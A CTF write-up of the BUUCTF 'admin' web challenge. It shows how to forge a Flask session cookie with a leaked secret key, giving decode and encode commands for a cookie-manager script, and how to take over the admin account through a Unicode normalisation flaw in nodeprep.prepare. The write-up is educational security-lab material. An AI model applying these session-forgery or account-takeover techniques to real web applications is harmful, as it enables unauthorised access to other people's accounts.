Article Directory
Title description
The topic comes from BUUCTF, link: click me to view
Unexpected solution of metaphysics
The title name is admin, it should be to log in with admin
This is also confirmed in the source code
I tried to enter the password randomly on the login page, and when I entered 123, it was logged in! ! !
In this case, brute force cracking can also get the flag, but considering the difficulty of the buuctf web question, it is impossible to be so simple, so I searched the wp, combined with other people's wp and learned a lot, record it here
Flask session forgery (also unexpected solution)
The session in flask is stored in the client cookie, that is, stored locally. We can modify the session to achieve the effect of forging the admin user.
There is a corresponding script on github: click me to view
But the session is encrypted, we need to know the secret key to modify the session
Find secret key
After registering an account and logging in, there is git source code on the password modification page
Download it and find the secret key in config.py
Fake session
Then we can fake session with script
Decrypt the original session first
python3 flask_session_cookie_manager3.
py decode -s "ckj123" -c ".eJw9kMGKwjAQhl9lmbOHbZuT4EFIt2whEwpTy-Qirq0mqXGhKtqI775VFk8D__fzDTN3WO-G7mRhfh4u3QzWroX5HT5-YA7YVAk2amRCz7FPlVQCCyU4_QrGo9XSOKS9UN5YDqseJaco-9uUZVqWjklFDtOMedQyv2qqMlPkV-ON51BHLMrA0QZTrJx6OqkNnNbTzjxTTTX1sMenI1YjFsbqphaKeNQNZ-hLr2krmFpn5HIBjxlsT8Nuff7tu-P7BE15ogu0iozTzXdkvxSY5qMie-C4F0aW1pBKkaqIobpxPHi8Ll46Fzb77m2qDytU_-S4CROABGZwOXXD62eQfMLjD-mobCE.Xq5sUg.8y1k1rWI_KY5cx0H4qGeLmOYtLw"
Then modify the name to admin
python3 flask_session_cookie_manager3.
py encode -s "ckj123" -t "{'_fresh': True, 'name': 'admin', 'image': b'RUM3', 'user_id': '10', '_id': b'5d55c2a3cc960384c8caff3a86b58826abed46649158782ba33bbbc13810947da0f6cbe34bfc8fdeb3afe7fce55a71d0f3d533c424fa9e81629f762c978a7bd0', 'csrf_token': b'9158ca16b9b3b087a218ec88d2ae365436d1c9c7'}"
The original session looks like this
We modify the session on the left to the session above
Successfully forged the admin user to get the flag
unicode deception (expected solution)
In fact, this solution is the original author's expected solution, but the code written by the author at that time was not rigorous, leading to many unexpected solutions.
Reading the source code, we can find that strlower is used to change the password for registration, login and modification into lowercase. And this function is custom
def strlower(username):
username = nodeprep.prepare(username)
return username
There is a loophole in the nodeprep.prepare function
For the character ᴬ, calling the function once will be converted to A, and calling the function again will be converted to a
So we register a user named ᴬdmin and log in normally. The home page will show that our username is Admin
If we use Admin to change the password, first it calls the strlower function to convert Admin to admin, so that we actually change the password of admin
Then we can log in with the admin user and the password we just modified
Write at the end
Although the author of the question was negligent, we have learned a lot of postures for us, so let's continue!